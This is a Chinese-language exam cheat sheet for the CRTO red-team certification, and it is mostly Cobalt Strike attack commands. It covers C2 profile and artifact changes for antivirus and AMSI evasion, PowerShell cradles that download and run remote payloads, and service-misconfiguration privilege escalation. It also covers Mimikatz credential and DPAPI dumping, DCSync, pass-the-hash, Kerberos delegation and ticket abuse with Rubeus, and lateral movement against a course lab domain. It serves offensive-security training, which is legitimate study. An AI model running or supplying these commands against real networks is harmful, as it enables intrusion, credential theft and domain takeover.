这是一个CRTO考试的备忘录，其中包含了开始考试之前对C2进行的修改以及大概率要用到的代码。

开始之前

c2 profile

修改位于 cobaltstrike/c2-profiles/normal/webbug.profile 的profile，消除特征启用规避等等。

set tasks_max_size "2097152";

post-ex {
        set amsi_disable "true";
        set obfuscate "true";
        set smartinject "true";
        set spawnto_x64 "%windir%\\\\sysnative\\\\dllhost.exe";
        set spawnto_x86 "%windir%\\\\syswow64\\\\dllhost.exe";

}

stage {
    set userwx "false";
    set cleanup "true";
    set obfuscate "true";
    set sleep_mask "false";
    set module_x64 "xpsservices.dll";

    transform-x86 {
        prepend "\\x90\\x90\\x90";
        append "\\x90\\x90\\x90";
        strrep "ReflectiveLoader" ""; }

    transform-x64 {
        prepend "\\x90\\x90\\x90";
        append "\\x90\\x90\\x90";
        strrep "ReflectiveLoader" ""; }

    data "bigb0ss";

    stringw "0062 0069 0067 0062 0030 0073 0073";
}

之后检查profile文件是否格式正确

./c2lint c2-profiles/normal/webbug.profile

artifact

修改位于 C:\\Tools\\cobaltstrike\\arsenal-kit\\kits\\artifact 路径下的文件

# bypass-pipe.c
# line 130
sprintf(pipename, "%c%c%c%c%c%c%c%c%cmimi\\\\nana", 92, 92, 46, 92, 112, 105, 112, 101, 92);

# **Patch.c
# line 115
for (int x = 0; x < length; x++) {

    char* a = (char *)ptr + x;
    char* b = (char *)buffer + x;

    // random
    GetTickCount();

    *a = *b ^ key[x % 8];

 }**

wsl下进入 /mnt/c/Tools/cobaltstrike/arsenal-kit/kits/artifact/ 重新编译注入器。这里是提前获得的经验，如果还有问题要使用 GIDRA 进行定位修改。

./build.sh pipe VirtualAlloc 310272 5 false false none /mnt/c/Tools/cobaltstrike/artifacts

# 检查是否成功规避 关闭defender
C:\\Tools\\ThreatCheck\\ThreatCheck\\ThreatCheck\\bin\\Debug\\threatcheck.exe -f "c:\\tools\\cobaltstrike\\artifacts\\pipe\\artifact64big.exe"

# 用CS加载位于 c:/tools/cobaltstrike/artifacts/pipe/artifact.cna 的脚本

resource kit

针对powershell脚本进行包装规避。

cd /mnt/c/Tools/cobaltstrike/arsenal-kit/kits/resource

# 编辑 template.x64.ps1 
# line 26
for ($mimi = 0; $mimi -lt $v_code.Count; $mimi++) {
        $v_code[$mimi] = $v_code[$mimi] -bxor 35
    }

# 构建
./build.sh /mnt/c/Tools/cobaltstrike/resource

# 开启defender
C:\\Tools\\ThreatCheck\\ThreatCheck\\bin\\Debug\\ThreatCheck.exe -f C:\\Payloads\\smb_x64.ps1 -e amsi

成功规避之后使用CS加载脚本就行了。

硬件断点

绕过AMSI的脚本。

https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell

将该文件保存并host起来。在运行powershell脚本之前先请求这个文件。

iex (new-object net.webclient).downloadstring("<http://10.10.5.50/bypass>"); iex (new-object net.webclient).downloadstring("<http://10.10.5.50/a>")

Get-MpThreatDetection | Sort-Object InitialDetectionTime

spawn to 修改

横向移动的时候，修改spawn的目标。

ak-settings spawnto_x64 C:\\Windows\\System32\\dllhost.exe
ak-settings spawnto_x86 C:\\Windows\\SysWOW64\\dllhost.exe

提权

这里是crto限定，只记录教材里面的方法。

# 不加引号
execute-assembly C:\\Tools\\SharpUp\\SharpUp\\bin\\Release\\SharpUp.exe audit UnquotedServicePath

cd C:\\Program Files\\Vulnerable Services
upload C:\\Payloads\\tcp-local_x64.svc.exe
mv tcp-local_x64.svc.exe Service.exe

run sc stop VulnService1
run sc start VulnService1

run netstat -anp tcp
connect localhost 4444

# 攻击配置
execute-assembly C:\\Tools\\SharpUp\\SharpUp\\bin\\Release\\SharpUp.exe audit ModifiableServices
powershell-import C:\\Tools\\Get-ServiceAcl.ps1
powershell Get-ServiceAcl -Name VulnService2 | select -expand Access

mkdir C:\\Temp
cd C:\\Temp
upload C:\\Payloads\\tcp-local_x64.svc.exe

run sc config VulnService2 binPath= C:\\Temp\\tcp-local_x64.svc.exe

run sc stop VulnService2
run sc start VulnService2
connect localhost 4444

# 攻击程序
powershell Get-Acl -Path "C:\\Program Files\\Vulnerable Services\\Service 3.exe" | fl

download Service 3.exe
copy "tcp-local_x64.svc.exe" "Service 3.exe"

run sc stop VulnService3
upload C:\\Payloads\\Service 3.exe
run sc start VulnService3

connect localhost 4444
elevate uac-schtasks tcp-local

Mimikatz

mimikatz !lsadump::sam
mimikatz !sekurlsa::logonpasswords

mimikatz !sekurlsa::ekeys

dcsync acme.corp DEV\\krbtgt

身份伪装

pth DEV\\jking 59fc0f884922b4ce376051134c71e22c
mimikatz sekurlsa::pth /user:"lmonk" /domain:"ACME" /ntlm:0c714e4e1a97b15351e90d1aaa3ac3f8 /run:notepad.exe
acme.corp\\lmonk 0c714e4e1a97b15351e90d1aaa3ac3f8
ps
steal_token [PID]

ps
inject [PID] x64 tcp-local

make_token jking Qwer123

票据攻击

非约束委派

# 查找域中配置非约束委派的计算机
execute-assembly C:\\Tools\\ADSearch\\ADSearch\\bin\\Release\\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname

# 破坏之后转到 利用TGT

约束委派

获取配置约束委派的账户之后访问任意允许访问机器上的服务

# 查询计算机约束委派
execute-assembly C:\\Tools\\ADSearch\\ADSearch\\bin\\Release\\ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json

# 查询用户委派
execute-assembly C:\\Tools\\ADSearch\\ADSearch\\bin\\Release\\ADSearch.exe --search "(&(objectCategory=user)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json

# 破坏之后转到 利用TGT

# 这里 存在一个 altservice 可以访问任何服务 多了一个 /altservice:ldap 参数 这项可以执行域控制器同步 获取tgs可以是如下
execute-assembly C:\\Tools\\Rubeus\\Rubeus\\bin\\Release\\Rubeus.exe s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /altservice:ldap /user:sql-2$ /ticket:doIFuj[...snip...]lDLklP /nowrap

# 获取TGS票据之后创建新进程
execute-assembly C:\\Tools\\Rubeus\\Rubeus\\bin\\Release\\Rubeus.exe createnetonly /program:C:\\Windows\\System32\\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFuj[...snip...]lDLklP

基于资源的约束委派

修改受害者计算机访问控制，将我们加入其中，随便访问

# 查询所有计算机并且获得属性
powershell-import C:\\Tools\\PowerSploit\\Recon\\PowerView.ps1

powershell Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\\d]{4,10}" }

# sid转化为名字 发现是 DEV\\developers
powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107

# 查询都有谁 发现是bfarmer
powershell Get-DomainGroupMember -Identity "DEV\\Developers"

# SPN主体可以是计算机账户 比如提权之后的计算机
powershell Get-DomainComputer -Identity wkstn-2 -Properties objectSid
# S-1-5-21-569305411-121244042-2357301523-1109

# 通过 PowerView 操作 AD，将委派权限赋予某个攻击者控制的账户，使其能够在目标计算机（dc-2）上代表其他用户进行操作。
powershell $rsd = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-569305411-121244042-2357301523-1109)"; $rsdb = New-Object byte[] ($rsd.BinaryLength); $rsd.GetBinaryForm($rsdb, 0); Get-DomainComputer -Identity "dc-2" | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $rsdb} -Verbose

powershell Get-DomainComputer -Identity "dc-2" -Properties msDS-AllowedToActOnBehalfOfOtherIdentity

# 使用 WKSN-2$ 帐户对 Rubeus 进行 S4U 模拟
execute-assembly C:\\Tools\\Rubeus\\Rubeus\\bin\\Release\\Rubeus.exe triage

# 导出票据
execute-assembly C:\\Tools\\Rubeus\\Rubeus\\bin\\Release\\Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap

# 重新进行一次之前的流程 获取TGS
execute-assembly C:\\Tools\\Rubeus\\Rubeus\\bin\\Release\\Rubeus.exe s4u /user:WKSTN-2$ /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /ticket:doIFuj[...snip...]lDLklP /nowrap

# 生成新的进程
execute-assembly C:\\Tools\\Rubeus\\Rubeus\\bin\\Release\\Rubeus.exe createnetonly /program:C:\\Windows\\System32\\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFuj[...snip...]lDLklP

NTLM 到TGT

# mimikatz 查看的哈希 
execute-assembly C:\\Tools\\Rubeus\\Rubeus\\bin\\Release\\Rubeus.exe asktgt /user:jking /ntlm:59fc0f884922b4ce376051134c71e22c /nowrap

# Kerberos 加密密钥 aes256
execute-assembly C:\\Tools\\Rubeus\\Rubeus\\bin\\Release\\Rubeus.exe asktgt /user:jking /aes256:4a8a74daad837ae09e9ecc8c2f1b89f960188cb934db6d4bbebade8318ae57c6 /nowrap

利用TGT

用户账户

# 列出
execute-assembly C:\\Tools\\Rubeus\\Rubeus\\bin\\Release\\Rubeus.exe triage

# 导出
execute-assembly C:\\Tools\\Rubeus\\Rubeus\\bin\\Release\\Rubeus.exe dump /luid:0x5985a /service:krbtgt /nowrap

# 新建空壳会话
execute-assembly C:\\Tools\\Rubeus\\Rubeus\\bin\\Release\\Rubeus.exe createnetonly /program:C:\\Windows\\System32\\cmd.exe

# 导入
execute-assembly C:\\Tools\\Rubeus\\Rubeus\\bin\\Release\\Rubeus.exe ptt /luid:0x798c2c /ticket:doIFuj[...snip...]lDLklP

# 偷
steal_token 13840

机器账户

execute-assembly C:\\Tools\\Rubeus\\Rubeus\\bin\\Release\\Rubeus.exe s4u /impersonateuser:nlamb /self /altservice:cifs/dc-2.dev.cyberbotic.io /user:dc-2$ /ticket:doIGa[...snip...]uaW8= /nowrap

execute-assembly C:\\Tools\\Rubeus\\Rubeus\\bin\\Release\\Rubeus.exe createnetonly /program:C:\\Windows\\System32\\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIGa[...snip...]uaW8=

steal_token 18832

横向移动

# winrm 
jump winrm64 web.dev.cyberbotic.io smb
jump winrm web.dev.cyberbotic.io smb
jump psexec64 web.dev.cyberbotic.io smb

upload C:\\Payloads\\smb_x64.exe
remote-exec wmi web.dev.cyberbotic.io C:\\Windows\\smb_x64.exe
execute-assembly C:\\Tools\\SharpWMI\\SharpWMI\\bin\\Release\\SharpWMI.exe action=exec computername=web.dev.cyberbotic.io command="C:\\Windows\\smb_x64.exe"

内部攻击

DPAPI

# DPAPI
# 密码保存API
run vaultcmd /list
run vaultcmd /listcreds:"Windows Credentials" /all

execute-assembly C:\\Tools\\Seatbelt\\Seatbelt\\bin\\Release\\Seatbelt.exe WindowsVault
ls C:\\Users\\bfarmer\\AppData\\Local\\Microsoft\\Credentials
execute-assembly C:\\Tools\\Seatbelt\\Seatbelt\\bin\\Release\\Seatbelt.exe WindowsCredentialFiles
ls C:\\Users\\bfarmer\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-569305411-121244042-2357301523-1104
mimikatz !sekurlsa::dpapi
mimikatz dpapi::cred /in:C:\\Users\\bfarmer\\AppData\\Local\\Microsoft\\Credentials\\6C33AC85D0C4DCEAB186B3B2E5B1AC7C /masterkey:8d15395a4bd40a61d5eb6e526c552f598a398d530ecc2f5387e07605eeab6e3b4ab440d85fc8c4368e0a7ee130761dc407a2c4d58fcd3bd3881fa4371f19c214

计划任务

# 可能缓存了用户密钥
ls C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Credentials
mimikatz dpapi::cred /in:C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Credentials\\F3190EBE0498B77B4A85ECBABCA19B6E
mimikatz !sekurlsa::dpapi
mimikatz dpapi::cred /in:C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Credentials\\F3190EBE0498B77B4A85ECBABCA19B6E /masterkey:10530dda04093232087d35345bfbb4b75db7382ed6db73806f86238f6c3527d830f67210199579f86b0c0f039cd9a55b16b4ac0a3f411edfacc593a541f8d0d9

证书

其他

base64编码

# win
$str = 'IEX ((new-object net.webclient).downloadstring("<http://nickelviper.com/a>"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

# linux
set str 'IEX ((new-object net.webclient).downloadstring("<http://nickelviper.com/a>"))'
echo -en $str | iconv -t UTF-16LE | base64 -w 0